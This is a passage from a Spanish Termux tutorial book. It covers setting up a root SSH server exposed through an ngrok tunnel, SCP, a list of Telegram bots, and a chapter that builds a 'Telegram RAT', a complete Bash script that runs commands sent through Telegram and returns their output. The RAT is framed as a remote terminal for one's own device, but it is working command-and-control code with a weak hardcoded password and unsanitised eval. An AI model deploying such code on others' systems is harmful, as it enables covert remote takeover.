hacerlo sobre proot-distro con el argumento --isolated para tener una pequeña capa extra de seguridad. Ya vimos como utilizar la herramienta proot-distro en el [capítulo 11](#cap%C3%ADtulo-11-proot-distro): ```bash proot-distro install alpine ``` ##### Iniciar sesión interactiva aislada de Alpine A continuación, utilizaremos proot-distro para iniciar sesión en la distribución Alpine Linux de forma aislada. Ejecutamos el siguiente comando: ```bash proot-distro login alpine --isolated ``` ##### Instalar openssh en Alpine Una vez que hemos iniciado sesión en la distribución Alpine Linux, podemos instalar el paquete de OpenSSH, que nos permitirá configurar el servidor SSHD. Ejecutamos el siguiente comando: ```bash apk add openssh ``` ##### Generación de claves SSH Antes de configurar el servidor SSHD, necesitamos generar las claves SSH necesarias. Ejecutamos el siguiente comando: ```bash ssh-keygen -A ``` ##### Creae archivo de configuración de SSHD Este comando sobrescribe el contenido del archivo /etc/ssh/sshd_config con la configuración especificada. Aquí estamos permitiendo el inicio de sesión como usuario root, configurando el puerto de escucha en el puerto 8022, habilitando la autenticación por contraseña y desactivando algunas opciones de reenvío y redireccionamiento. ```bash echo 'Include /etc/ssh/sshd_config.d/*.conf Port 8022 PermitRootLogin yes AuthorizedKeysFile .ssh/authorized_keys PasswordAuthentication yes AllowTcpForwarding no GatewayPorts no X11Forwarding no Subsystem sftp internal-sftp' > /etc/ssh/sshd_config ``` ##### Generación de una contraseña para el usuario root Para habilitar el inicio de sesión como usuario root, necesitamos establecer una contraseña. Ejecutamos el siguiente comando: ```bash tr -dc '[:alnum:][:punct:]' < /dev/urandom | head -c 16 ``` Este comando genera una contraseña aleatoria de 16 caracteres para el usuario root. Puedes utilizar cualquier contraaeña que tu quieras, pero debes tener en cuenta que hay miles de scanneres y herramientas de fuerza bruta scanneando servicios SSH. Si pones una contraseña frágil, te van a hackear y podrán ejecutar comandos en tu dispositivo. ##### Establecimiento de la contraseña del usuario root Ahora, estableceremos la contraseña generada para el usuario root. Ejecutamos el siguiente comando: ```bash passwd root ``` Este comando solicitará que ingresemos la nueva contraseña para el usuario root. ##### Inicio del servidor SSHD Finalmente, iniciamos el servidor SSHD ejecutando el siguiente comando: ```bash /usr/sbin/sshd ``` ##### Conexión al servidor SSHD Ahora que hemos configurado y activado el servidor SSHD, podemos conectarnos a él desde otras máquinas (pcs, smartphones, etc) y/o otras terminales. Utilizamos el comando ssh para establecer una conexión SSH. ###### Para conexión desde otra pestaña de Termux u otro software en el mismo equipo: ```bash ssh [email protected] -p 8022 ``` ###### Para conexión desde otra maquina que se encuentre en la misma red local (mismo wi-fi) ```bash ssh [email protected] -p 8022 ``` __Remplaza la IP 192.168.1.40 por la IP privada que el router te asignó (IP local de tu Smartphone)__ ###### Para conexión desde fuera de nuestra red (cualquier máquina en cualquier parte, con router en casa) ```bash ssh [email protected] -p 8022 ``` __Remplaza la IP 93.184.216.34 por la IP pública de tu router y configura en el router la apertura/redirección de puertos de la IP pública hacia la IP local de tu Smartphone__ ###### Para conexión desde fuera de nuestra red (cualquier máquina en cualquier parte, datos móviles o no) Si utilzas datos móviles normalmente los proveedores de internet no te dan una IP pública única ni tampoco un router o una forma de abrir puertos, si no que te meten en una red compartida llamada CGNAT. Cuando estás en CGNAT no puedes exponer ningún tipo de servicio a internet. Para exponer nuestro servidor SSH lo que haremos será utilizar un servidor intermedio que encapsule el trafico mediante técnicas de tunelación. __Esta técnica funciona también aunque no uses datos móviles, asique si simplemente quierer ahorrarte abrir puertos, o tienes cualquier otro motivo también te sirve__ En el [Capítulo 19: Ngrok y Exponer Servicios](#cap%C3%ADtulo-19-ngrok-y-exponer-servicios) tienes mas información. ##### Instalar git Instalamos git para poder clonar el repositorio de un cliente código abierto de Ngrok ```bash apk add git ``` ##### Instalar tmux Instalamos también tmux ya que es una dependencia del cliente codigo abierto de ngrok ```bash apk add tmux ``` ##### Instalar ngrok opensource ```bash git clone https://github.com/StringManolo/ngrok; cd ngrok; chmod 775 ngrokWizard.sh; chmod 775 ngrokStart.sh; chmod 775 ngrokStop.sh; ./ngrokWizard.sh; ``` Lee y sigue las indicaciones que se muestran en consola para configurar y ejecutar ngrok. Una vez completado el proceso, en la salida de consola te saldrá un url con protocolo tcp acompañado de un puerto, por ejemplo: __tcp://8.tcp.ngrok.io:16459__ Podremos conectarnos a nuestra máquina al igual que hicimos en local pero ahora desde cualquier lugar/dispositivo; ```bash ssh [email protected] -p 16459 ``` Puedes cerrar todo simplemente corriendo el comando __exit__ Para volver a activar el SSH ngrok y demás no necesitarás repetir todo el proceso, simplemente ingresas al Alpine linux, ejecutas el ssh y el ./ngrokStart.sh, pones el puerto 8022 y listo: ```bash proot-distro login alpine --isolated ``` ```bash /usr/sbin/sshd; /root/ngrok/ngrokStart.sh; ``` ### SCP SCP (Secure Copy) es un protocolo basado en SSH que permite la transferencia segura de archivos entre sistemas remotos. Con SCP, puedes copiar archivos y directorios de forma segura de un sistema a otro. ##### Copiar archivos desde el sistema local al sistema remoto Para copiar archivos desde el sistema local al sistema remoto utilizando SCP, utiliza el siguiente comando: ```bash scp miArchivo.txt [email protected]:/home/archivos -p 8022 ``` El comando te pedirá la contraseña del usuario remoto. Ingrésala y presiona "Enter" para iniciar la transferencia del archivo. ##### Copiar archivos desde el sistema remoto al sistema local Para copiar archivos desde el sistema remoto al sistema local utilizando SCP, utiliza el siguiente comando: ```bash scp [email protected]:/home/archivos/logServidor.txt ~/logs/ -p 8022 ``` ##### Copiar directorios recursivamente Para copiar un directorio completo de forma recursiva desde el sistema local al sistema remoto o viceversa, utiliza el siguiente comando: ``` scp -r fotos [email protected]:/home/imagenes ``` [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 23: Bots de Telegram Telegram es una app de mensajería que puede resultar de gran utilidad para desarrolladores y hackers, en parte gracias a los bots. Los bots son programas normales pero con la capacidad añadida de que pueden usar telegram. Esto te permite enviar texto desde telegram a tu dispositivo y viceversa, esto nos da infinitas posibilidades. ##### Listado de bots útiles: - [Conversor De Archivos](https://t.me/newfileconverterbot) Le pasas un archivo y te lo convierte a otro formato. Soporta 874 formatos. - [Email Temporal DropMail](https://t.me/DropMailBot) Te da emails temporales que duran 10 minutos. - [Email Temporal TempMail](https://t.me/TempMail_org_bot) Otro bot de email temporales. - [Email Mailable](https://t.me/mailableBot) Este bot the permite crear tu dirección de correo, mandar y recibir correos desde Telegram - [GMAIL](https://t.me/GmailBot) Bot oficial de gmail. Te llevan los emails a telegram y puedes contestarles, enviar correos, etc. - [Subir Archivos AnonFile](https://t.me/anonfileuploaderbot) Te permite subir archivos a anonfiles.com desde telegram y te da el enlace de descarga - [Traductor De Idiomas](https://t.me/BabelgramBot) Traduce conversaciones entre distintos idiomas. - [Imagenes de mapas y satellites](https://t.me/openmap_bot) Le introduces una dirección y te da una imagen de la zona. - [Convierte audios a texto](https://t.me/TranscribeME_bot) Le mandas un audio y te da en texto lo que dice la persona. - [Obten el texto de imágenes](https://t.me/TexifyBot) Le mandas una imagen y te da el texto que salga en ella. - [Convierte texto a voz](https://t.me/text_to_speach_bot) Le mandas un texto y te devuelve un audio leyendo el texto. - [Convierte Web a imagen/es o pdf](https://t.me/BetterWebShotBot) Le pones la url y te permite obtener una (o varias) imagen o pdf de la web. - [Antivirus VirusTotal](https://t.me/VirusTotalAV_bot) Le mandas un archivo y comprueba si tiene virus. - [Antivirus DrWeb](https://t.me/DrWebBot) Le mandas un archivo y comprueba si tiene virus. - [BD de Smartphones](https://t.me/SmartphoneDBot) Introduces la marca/modelo y te sale todo el listado de modelos y todas sus especificaciones. - [Ejecuta código javascript](https://t.me/injsbot) Ejecuta el código javascript que le envies y te devuelve el resultado. - [Ejecuta código en múltiples lenguajes](https://t.me/RextesterRoBot) Ejecuta código en muchos lenguajes distintos y te da el resultado. - [Descarga Youtube/Tiktok](https://t.me/redownload_bot) Descarga videos como video o audio. - [Crea códigos QR](https://t.me/qr_livebot) Introduce un texto o url y te genera la imagen QR. _Estos bots están todos operativos y son accesibles gratuitamente en el momento en el que se ha escrito este artículo. Esto puede cambiar si lo lees mucho tiempo después de que se escribiese_ [Tabla de Contenidos](#tabla-de-contenidos) ---- ## Capítulo 24: Telegram RAT ### Qué es un RAT? RAT puede hacer referencia a 2 acrónimos en inglés: 1. Remote Access Tool 2. Remote Acesss Trojan Una Remote Access Tool (Herramienta de Acceso Remoto) es un programa informático que permite a un usuario acceder/controlar un dispositivo remoto. Son herramientas creadas para permitir administrar o dar soporte a sistemas sin tener accesso físico a ellos. Un Remote Access Trojan (Troyano de Acceso Remoto) es un tipo de software malicioso que se oculta en un programa aparentemente legítimo y permite a un atacante acceder y controlar un dispositivo remoto de manera no autorizada. Estos troyanos son utilizados con fines maliciosos, permitiendo a los ciberdelincuentes acceder y controlar dispositivos a distancia sin el conocimiento del usuario. Es decir es una herramienta de acceso remoto a la que se le han incluido funcionalidades que permitan su uso malicioso, como pueden ser la elevación de privilegios, polymorfismo, exfiltración de datos, invisibilidad, persistencia, etc. Si te suena el término botnet, normalmente las botnets son un montón de sistemas infectados por un RAT que pueden ser controlados simultaneamente. ### Requisitos - Cuenta de Telegram - Bash - jq - curl ### Creando el RAT En el [Capítulo 5: Introducción a Bash](#cap%C3%ADtulo-5-introducci%C3%B3n-a-bash) aprendimos un poco sobre el lenguaje Bash, asique será el que vamos a utilizar para crear el bot. Antes de programar algo, sobre todo si somos inexpertos, es importante definir la lógica y las funcionalidades que queremos que tenga nuestro programa. Para hacer esto podemos usar pseudocódigo o bien el propio idioma español. Esto nos permitirá definir una idea clara de como y que será el programa. Podemos primero hacer un listado de las funcionalidades: - Leer los mensajes de una cuenta Bot de Telegram - Borrar los mensajes de la cuenta Bot de Telegram - Enviar mensajes a la cuenta de Telegram - Sistema de login - Usuarios logeados pueden correr comandos en el sistema - Usuarios no logeados pueden correr comandos como /help o /login Una vez tenemos la lista de lo que queremos que haga el programa, podemos escribir como sería el código en español en un lenguaje inventado: ``` -comentario- VariablesGlobales: crear lista usuariosLogeados -comentario- Funciones: funcion LeerMensajes mensajes = solicitarMensajes a telegram retornar mensajes funcion BorrarMensajes solicitarBorradoDeMensajes a telegram funcion EnviarMensaje mensaje_del_bot usuario_x enviarMensaje mensaje_del_bot al usuario_x de telegram funcion Login usuario_x contrasena_x si usuario_x está en la lista retornar VERDADERO funcion CorrerComandosEnSistema usuario_x comando_a_correr si (ComprobarSiUsuarioEnLista usuario_x) igual a VERDADERO respuestaDelComando = ejecutar comando_a_correr retornar respuestaDelComando -comentario- Código principal: bucleInfinito: mensaje = LeerMensajes si mensaje tiene /login si login usuario_x contrasena_x igual a VERDADERO Añadir usuario_x a la lista de usuariosLogeados si mensaje tiene hola EnviarMensaje "Hola soy el RAT" usuario_x si mensaje tiene /ejecutar_comando si (ComprobarSiUsuarioEnLista usuario_x) igual a VERDADERO respuestaDelComando = ejecutar comando_a_correr EnviarMensaje respuestaDelComando usuario_x BorrarMensajes Esperar 5 segundos ``` Como puedes observar el código es bastante sencillo. Esto es lo que sería la lógica principal del programa. Obviamente se omiten pequeños detalles como manejo de errores, obtener el nombre del usuario de los mensajes, etc. Ya que el objetivo de hacer este pseudocódigo es definir la lógica principal/estructura que queremos que tenga nuestro programa. El siguiente paso es escribir este mismo código pero en un lenguaje real. En nuestro caso Bash, pero se puede utilizar cualquier otro. ##### Creando el bot de Telegram Para poder interactuar con Telegram, lo primero será crear un bot de telegram que guardará los mensajes que le mandemos, y así nosotros podremos acceder a ellos desde el RAT. Como ya vimos en los requisitos necesitamos tener una cuenta de Telegram para poder crear bots. Una vez tienes una cuenta puedes crear un bot en la siguiente url: [https://t.me/BotFather](https://t.me/BotFather), si estás en Android con hacer click ya te abre el chat con BotFather para poder crear tu bot. Una vez dentro del chat de tg con BotFather le escribirás el comando /newbot para iniciar la creación de un nuevo bot. Te pedirá que escribas el nombre del bot. Puedes ponerle por ejemplo: RAT_De_TuNombre Tras enviarle el nombre de tu bot, te dirá que necesita un nombre de usuario para la cuenta del bot. Es decir, te está pidiendo el @ del bot. Una de las condiciones de las cuentas de bots es que su nombre de cuenta debe terminar por la palabra bot. Asique puedes llamarlo RAT_De_TuNombre_Bot que en mi caso sería RAT_De_Manolo_Bot Si el nombre es válido, verás un mensaje como: ``` Done! Congratulations on your new bot. You will find it at t.me/RAT_De_Manolo_Bot. You can now add a description, about section and profile picture for your bot, see /help for a list of commands. By the way, when you've finished creating your cool bot, ping our Bot Support if you want a better username for it. Just make sure the bot is fully operational before you do this. Use this token to access the HTTP API: 5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9 Keep your token secure and store it safely, it can be used by anyone to control your bot. For a description of the Bot API, see this page: https://core.telegram.org/bots/api ``` En este mensaje se incluye una url para poder hablar con el bot y un token que debes poner en las peticiones que hagas al bot, por ejemplo para obtener los mensajes que le enviaron al bot. *IMPORTANTE*: _Este token no debes compartirlo con nadie, ya que se puede utilizar para controlar el bot y por tanto si lo tienes funcionando en tu sistema o en otro, un desconocido que tenga tu token del bot podría también controlar el sistema sin que tu lo sepas._ Podemos probar que todo funciona correctamente con un comando de curl. Abre un chat con el bot usando el enlace que te dio BotFather y envíale el mensaje Hola! Utiliza el siguiente comando para solicitar los mensajes del bot con curl: ```bash curl 'https://api.telegram.org/botYOUR_BOT_TOKEN/getUpdates' ``` Obviamente remplaza YOUR_BOT_TOKEN por el token de tu bot. En mi caso sería: ```bash curl 'https://api.telegram.org/bot5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9/getUpdates' ``` *NOTA*: _/getUpdates así como otros endpoints de la API de Telegram Bot están publicadas en la web de telegram. [Bot API](https://core.telegram.org/bots/api). Si bajas por la web verás el getUpdates que estoy utilizando, asi como otros que están disposibles_ Si todo está correcto, verás una respuesta similar a: ```json {"ok":true,"result":[{"update_id":241851273, "message":{"message_id":1,"from":{"id":827150271,"is_bot":false,"first_name":"StringManolo","username":"StringManolo","language_code":"es"},"chat":{"id":167170617,"first_name":"StringManolo","username":"StringManolo","type":"private"},"date":1662723616,"text":"Hola"}}]} ``` Este formato se conoce como JSON y es bastante utilizado por muchos servicios. Con el comando *jq* podremos extraer exactamente lo que necesitemos de la respuesta del bot. Por ejemplo si queremos obtener solo el mensaje: ```bash curl -s curl 'https://api.telegram.org/bot5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9/getUpdates' | jq .result[0].message.text ``` Veremos como resultado el mensaje 'Hola' que le escribimos al bot en el chat. La sintaxis de jq es sencilla de entender, los puntos son para acceder a propiedades (es decir los nombres), y los corchetes son para acceder al mensaje en concreto. Por ejemplo con [0] accedemos al primer mensaje, con [1] accedemos al segundo, con [9] accedemos al décimo, etc. En este caso solo tenemos el de Hola, pero si le envias mas cosas al chat del bot, tendrás mas. Si espaciamos el JSON podemos ver mejor su estructura visualmente: ```json { "ok": true, "result": [ { "update_id": 241851273, "message": { "message_id": 1, "from": { "id": 827150271, "is_bot": false, "first_name": "StringManolo", "username": "StringManolo", "language_code": "es" }, "chat": { "id": 167170617, "first_name": "StringManolo", "username": "StringManolo", "type": "private" }, "date": 1662723616, "text": "Hola" } }, { "update_id": 241851274, "message": { "message_id": 2, "from": { "id": 827150271, "is_bot": false, "first_name": "StringManolo", "username": "StringManolo", "language_code": "es" }, "chat": { "id": 167170617, "first_name": "StringManolo", "username": "StringManolo", "type": "private" }, "date": 1662723640, "text": "Otro Mensaje" } } ] } ``` Le añadí otro mensaje para que veas como queda. Pues ahora que ya vemos mas o menos como funciona, lo que haremos es usar Bash para obtener estos mensajes programáticamente, analizarlos y tomar decisiones en base al texto que recibamos, por ejemplo si recibimos el mensaje /saluda podremos obtener el nombre del usuario que nos envió ese mensaje, el id del chat y enviarle un mensaje tal que 'Hola Manolo' al mismo chat que nos envió el mensaje /saluda. Con esta sencilla técnica si detectamos el mensaje '/run ls' podremos ejecutar el comando ls usando Bash y enviarle al chat del usuario la respuesta del comando ls. Así de esta forma es como tener una terminal remota, ya que todos los comandos que le ponemos en el chat de telegram nuestro programa en bash los ejecutará y nos enviará la respuesta. Pues procedamos a implementar en bash nuestra primera función LeerMensajes que hicimos en pseudocódugo en español. _Para programar usaré VIM como editor de texto. Si no lo manejas puedes revisar el_ [Capítulo 6: Uso de VI y de VIM](#cap%C3%ADtulo-6-uso-de-vi-y-de-vim) _o puedes utilizar cualquier otro editor de texto._ Crearé el archivo llamado rat.sh con el siguiente comando: ```bash vim rat.sh ``` ##### Y dentro del archivo haremos la función LeerMensajes: ```bash TOKEN='5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9'; LeerMensajes() { local -n referenciaMensajes=$2; local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$1; # $TOKEN comando+='/getUpdates'"'"' --silent'; referenciaMensajes=$(eval $comando); } LeerMensajes $TOKEN mensajes; echo $mensajes ``` Explicación del código: - Utilizo una variable para almacenar el token, ya que si lo metes directamente en el url y en el futuro utilizas otro bot, o cambias el token de tu bot tendrías que cambiarlo de todas las urls. En cambio usando la variable TOKEN tan solo hay que cambiarle el token ahí. - Obtengo una referencia local a la segunda variable que se pase en la llamada a la función (es una técnica para poder rellenar la variable mensajes con lo que queramos) - Creo un texto tal que curl 'https://.....' después le añado el TOKEN, después el resto de la url. - Evalúo el texto para ejecutarlo como comando. - Le asigno a mensajes la respuesta del comando (el JSON). - Añadí también un código de ejemplo de como se utiliza la función para guardar el JSON en una variable y lo imprimo en consola. Si sales del editor y ejecutas el código con el comando: ```bash bash rat.sh ``` Verás la misma salida que obteníamos al correr el comando curl en consola solicitando los mensajes. Es decir, la función lo único que hace es guardar en una variable $mensajes la respuesta del comando curl. ##### Para la función BorrarMensajes haremos lo mismo: ```bash ultimoId=0; BorrarMensajes() { local -n referenciaMensajes=$2; local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$1; # $TOKEN comando+='/getUpdates?offset='; comando+=$(($ultimoId)); comando+=''"'"' --silent'; referenciaMensajes=$(eval $comando); } ``` Explicación del código: - El código es prácticamente igual que la función LeerMensajes - Cambiamos el método del endpoint a /getUpdates?offset=$ultimoId Por el resto es lo mismo. Esto lo explican en la documentación de Telegram Bot API. Al pasarle el id de update del JSON se borran automáticamente los mensajes anteriores. El id de update lo verás en el json, en este caso la variable ultimoId es una variable global como TOKEN que modificaremos mas adelante. ##### La siguiente función es la de EnviarMensaje: ```bash # Codifica comillas, guiones, barra invertida y otros caracteres especiales CodificarMensaje() { local cadena="${1}"; local tamanhoCadena=${#cadena}; local codificado=""; local pos c o; for (( pos=0 ; pos<tamanhoCadena ; pos++ )); do c=${cadena:$pos:1} case "$c" in [-_.~a-zA-Z0-9] ) o="${c}" ;; * ) printf -v o '%%%02x' "'$c" esac codificado+="${o}"; done globalCodificado=$(echo "${codificado}"); } EnviarMensaje() { local -n referenciaResultado=$3; local respuesta=$1; local idChat=$2; # Si la respuesta es mas grande que la permitida por telegram, se envia en trozos de 4000 caracteres if [[ ${#respuesta} -gt 4000 ]]; then local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$TOKEN; comando+='/sendMessage?chat_id='; comando+=$chatId; comando+='&text='; comando+='Respuesta En Trozos:'; comando+=''"'"' --silent'; # Envía el mensaje "Respuesta En Trozos:" indicando que la respiesta se enviará en múltiples mensajes referenciaResultado=$(eval $comando); # Envía los mensajes en trozos de 4.000 caracteres for ((i=0; i<${#respuesta}; i+=4000)) do local comando2='curl '"'"'https://api.telegram.org/bot'; comando2+=$TOKEN; comando2+='/sendMessage?chat_id='; comando2+=$idChat; comando2+='&text='; globalCodificado=""; CodificarMensaje "${respuesta:$i:4000}"; comando2+="$globalCodificado"; comando2+=''"'"' --silent'; referenciaResultado=$(eval $comando2); done else local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$TOKEN; comando+='/sendMessage?chat_id='; comando+=$idChat; comando+='&text='; globalCodificado=""; CodificarMensaje "$respuesta"; comando+="$globalCodificado"; comando+=''"'"' --silent'; referenciaResultado=$(eval $comando); fi } ``` Explicación del código: - Esta función es prácticamente igual a las otras 2 pero es un poco más larga porque contiene una solución para casos en los que el mensaje de consola es demasiado largo como para enviarlo directamente en un solo mensaje de Telegram (Ya que el tamaño máximo de un mensaje de telegram es unos 4.000 caracteres). - También al enviar el mensaje con curl y utilizando una url es necesario escapar ciertos caracteres, y por eso se incluye la función CodificarMensaje. ##### Ahora la función de Login: ```bash usuariosLogeados=(); # Comprueba si el @usuario se ha logeado (Usando el comando /login contrasenha) Login() { local -n referenciaResultado=$2; local usuario=$1; for ((i=0; i < ${#usuariosLogeados}; i++)) do if [[ $usuario = ${usuariosLogeados[$i]} ]]; then referenciaResultado="true"; return; fi done referenciaResultado="false"; } ``` Explicación del código: - En esta función recorremos la lista de usuariosLogeados para comprobar si el @usuario se encuentra en ella. De momento la lista está vacia, la llenaremos mas adelante cuando el usuario mande el mensaje '/login contraseña' siendo contraseña una variable global que contenga una contraseña que tu quieras usar para el login. ##### La función para correr comandos podría quedar tal que: ```bash CONTRASENHA='123456'; # Esta función comprueba si se ha detectado algún comando y define que hacer cuando se detecta el comando CorrerComando() { local -n referenciaResultado=$4; local texto=$1; local usuario=$2; local idChat=$3; printf '%s me envió %s usando el chat n°%s\n' "$usuario" "$texto" "$idChat"; # Haz loggin del usuario local aux='/login '; aux+="$CONTRASENHA"; # Comprueba si el mensaje del usario es igual a /login $CONTRASENHA if [[ "$texto" = "\"$aux\"" ]]; then usuariosLogeados+=($usuario); local aux2="$usuario"; aux2+=' ha ingresado'; EnviarMensaje "$aux2" "$idChat" dummy; fi # Los comandos /start y hola están aquí como ejemplo de como se crean comandos if [[ ${texto:1:4} = 'hola' || ${texto:1:6} = '/start' ]]; then echo "/start o hola encontrados!"; local aux3='Hola '; aux3+=$usuario; aux3+=', como estas?'; EnviarMensaje "$aux3" "$idChat" dummy fi local haIngreaado; Login "$usuario" haIngreaado; if [[ $haIngreaado = 'true' ]]; then if [[ ${texto:1:4} = '/run' ]]; then tamanhoComando=${#texto}; tamanhoComando=$(($tamanhoComando - 7)); salida="$(eval ${texto:6:$tamanhoComando})"; if [[ -z $salida ]]; then EnviarMensaje 'El comando no genero ningun texto en la terminal' "$idChat" dummy else EnviarMensaje "$salida" "$idChat" dummy fi fi fi } ``` Explicación del código: - Aquí creamos una global CONTRASEÑA para compararla con la que ponga el usuario tras el comando /login. Si coinciden lo añadimos a la lista de usuarios logeados. - Definimos un comando */start* y un texto *hola* a los que el bot siempre responderá. Aquí podrías añadir los comandos típicos como puedan ser /help o /ayuda para que el bot indique a cualquier usuario como se utiliza, etc. - Definimos el comando /login para que los usuarios puedan obtener privilegios. - Definimos el comando /run que solo lo podrán usar usuarios logeados y que nos sirve para ejecutar comandos en la máquina que está corriendo el código. Creando así una terminal remota. Hacer esta comprobación nos posibilita el hacer login en el bot desde un chat privado, meter el bot en un chat público y correr comandos sobre él sin que los demás usuarios del chat público puedan hacerlo (al no saber ellos la contraseña de login). ##### Ahora solo nos falta la lógica principal: ```bash # Logica del Bot (bucle principal) while [ true ]; do LeerMensajes $TOKEN nuevosMensajes; if [[ -z $nuevosMensajes ]]; then echo 'No ha sido posible obtener los mensajes de Telegram'; exit; fi if [[ ! $(echo $nuevosMensajes | jq .ok) = true ]]; then echo 'La API de Telegram ha fallado'; exit; fi mensajes=$(echo $nuevosMensajes | jq .result); if [[ -z $mensajes ]]; then echo 'No hay mensajes con los que trabajar'; exit; fi numeroDeMensajes=$(echo $mensajes | jq '. | length'); for ((m=1; m<$numeroDeMensajes; m++)) do texto='NULL' texto=$(echo $mensajes | jq .[$m].message.text); usuario='NULL'; usuario=$(echo $mensajes | jq .[$m].message.from.username); idChat=0; idChat=$(echo $mensajes | jq .[$m].message.chat.id); ultimoId=$(echo $mensajes | jq .[$m].update_id); if [[ $texto != 'NULL' && $usuario != 'NULL' && $idChat -ne 0 ]]; then CorrerComando "$texto" "$usuario" "$idChat" dummy; fi done BorrarMensajes "$TOKEN" dummy; sleep 5s; done ``` Explicación de código: - Hacemos un bucle infinito para que el bot esté todo el rato comprobando si le llegan mensajes nuevos y ejecutándolos cuando corresponda. - Hacemos algunas comprobaciones para detectar errores. - Extraemos la información necesaria, como el nombre del usuario, a que chat le responderemos y los mensajes que nos manda. - Le ponemos el id de actualización a la variable ultimoId para que se borren los mensajes tras procesarlos. - Recorremos todos los mensajes y ejecutamos la función CorrerComando para ejecutar los comandos que le llegan en cada uno de los mensajes. - Por último borramos los mensajes y esperamos 5 segundos antes de volver a revisar si hay mensajes nuevos y repetir todo el ciclo. ##### El código al completo de rat.sh queda tal que: ```bash TOKEN='5863933391:HBGUBfzdfpp0QtZVSvGaWUMbWvJi7dWLJK9'; ultimoId=0; globalCodificado=""; usuariosLogeados=(); CONTRASENHA='123456'; LeerMensajes() { local -n referenciaMensajes=$2; local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$1; # $TOKEN comando+='/getUpdates'"'"' --silent'; referenciaMensajes=$(eval $comando); } BorrarMensajes() { local -n referenciaMensajes=$2; local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$1; # $TOKEN comando+='/getUpdates?offset='; comando+=$(($ultimoId)); comando+=''"'"' --silent'; referenciaMensajes=$(eval $comando); } # Codifica comillas, guiones, barra invertida y otros caracteres especiales CodificarMensaje() { local cadena="${1}"; local tamanhoCadena=${#cadena}; local codificado=""; local pos c o; for (( pos=0 ; pos<tamanhoCadena ; pos++ )); do c=${cadena:$pos:1} case "$c" in [-_.~a-zA-Z0-9] ) o="${c}" ;; * ) printf -v o '%%%02x' "'$c" esac codificado+="${o}"; done globalCodificado=$(echo "${codificado}"); } EnviarMensaje() { local -n referenciaResultado=$3; local respuesta=$1; local idChat=$2; # Si la respuesta es mas grande que la permitida por telegram, se envia en trozos de 4000 caracteres if [[ ${#respuesta} -gt 4000 ]]; then local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$TOKEN; comando+='/sendMessage?chat_id='; comando+=$chatId; comando+='&text='; comando+='Respuesta En Trozos:'; comando+=''"'"' --silent'; # Envía el mensaje "Respuesta En Trozos:" indicando que la respiesta se enviará en múltiples mensajes referenciaResultado=$(eval $comando); # Envía los mensajes en trozos de 4.000 caracteres for ((i=0; i<${#respuesta}; i+=4000)) do local comando2='curl '"'"'https://api.telegram.org/bot'; comando2+=$TOKEN; comando2+='/sendMessage?chat_id='; comando2+=$idChat; comando2+='&text='; globalCodificado=""; CodificarMensaje "${respuesta:$i:4000}"; comando2+="$globalCodificado"; comando2+=''"'"' --silent'; referenciaResultado=$(eval $comando2); done else local comando='curl '"'"'https://api.telegram.org/bot'; comando+=$TOKEN; comando+='/sendMessage?chat_id='; comando+=$idChat; comando+='&text='; globalCodificado=""; CodificarMensaje "$respuesta"; comando+="$globalCodificado"; comando+=''"'"' --silent'; referenciaResultado=$(eval $comando); fi } # Comprueba si el @usuario se ha logeado (Usando el comando /login contrasenha) Login() { local -n referenciaResultado=$2; local usuario=$1; for ((i=0; i < ${#usuariosLogeados}; i++)) do if [[ $usuario = ${usuariosLogeados[$i]} ]]; then referenciaResultado="true"; return; fi done referenciaResultado="false"; } # Esta función comprueba si se ha detectado algún comando y define que hacer cuando se detecta el comando CorrerComando() { local -n referenciaResultado=$4; local texto=$1; local usuario=$2; local idChat=$3; printf '%s me envió %s usando el chat n°%s\n' "$usuario" "$texto" "$idChat"; # Haz loggin del usuario local aux='/login '; aux+="$CONTRASENHA"; # Comprueba si el mensaje del usario es igual a /login $CONTRASENHA if [[ "$texto" = "\"$aux\"" ]]; then usuariosLogeados+=($usuario); local aux2="$usuario"; aux2+=' ha ingresado'; EnviarMensaje "$aux2" "$idChat" dummy; fi # Los comandos /start y hola están aquí como ejemplo de como se crean comandos if [[ ${texto:1:4} = 'hola' || ${texto:1:6} = '/start' ]]; then echo "/start o hola encontrados!"; local aux3='Hola '; aux3+=$usuario; aux3+=', como estas?'; EnviarMensaje "$aux3" "$idChat" dummy fi local haIngreaado; Login "$usuario" haIngreaado; if [[ $haIngreaado = 'true' ]]; then if [[ ${texto:1:4} = '/run' ]]; then tamanhoComando=${#texto}; tamanhoComando=$(($tamanhoComando - 7)); salida="$(eval ${texto:6:$tamanhoComando})"; if [[ -z $salida ]]; then EnviarMensaje 'El comando no genero ningun texto en la terminal' "$idChat" dummy else EnviarMensaje "$salida" "$idChat" dummy fi fi fi } # Logica del Bot (bucle principal) while [ true ]; do LeerMensajes $TOKEN nuevosMensajes; if [[ -z $nuevosMensajes ]]; then echo 'No ha sido posible obtener los mensajes de Telegram'; exit; fi if [[ ! $(echo $nuevosMensajes | jq .ok) = true ]]; then echo 'La API de Telegram ha fallado'; exit; fi mensajes=$(echo $nuevosMensajes | jq .result); if [[ -z $mensajes ]]; then echo 'No hay mensajes con los que trabajar'; exit; fi numeroDeMensajes=$(echo $mensajes | jq '. | length'); for ((m=1; m<$numeroDeMensajes; m++)) do texto='NULL' texto=$(echo $mensajes | jq .[$m].message.text); usuario='NULL'; usuario=$(echo $mensajes | jq .[$m].message.from.username); idChat=0; idChat=$(echo $mensajes | jq .[$m].message.chat.id); ultimoId=$(echo $mensajes | jq .[$m].update_id); if [[ $texto != 'NULL' && $usuario != 'NULL' && $idChat -ne 0 ]]; then CorrerComando "$texto" "$usuario" "$idChat" dummy; fi done BorrarMensajes "$TOKEN" dummy; sleep 5s; done ``` *RECUERDA*: _Para ejecutarlo necesitas poner el token de tu bot de Telegram, poner una contraseña, tener una cuenta de usuario con el @nombre (para que el bot te meta a la lista de usuarios logeados). También necesitas instalar *bash*, *curl* y *jq* en el sistema que va a correr el bot_ Para ejecutarlo simplemente usa el comando: ```bash bash rat.sh ``` *NOTA*: _La versión en inglés, que es una versión mas completa y actualizada de este programa se encuentra en_ 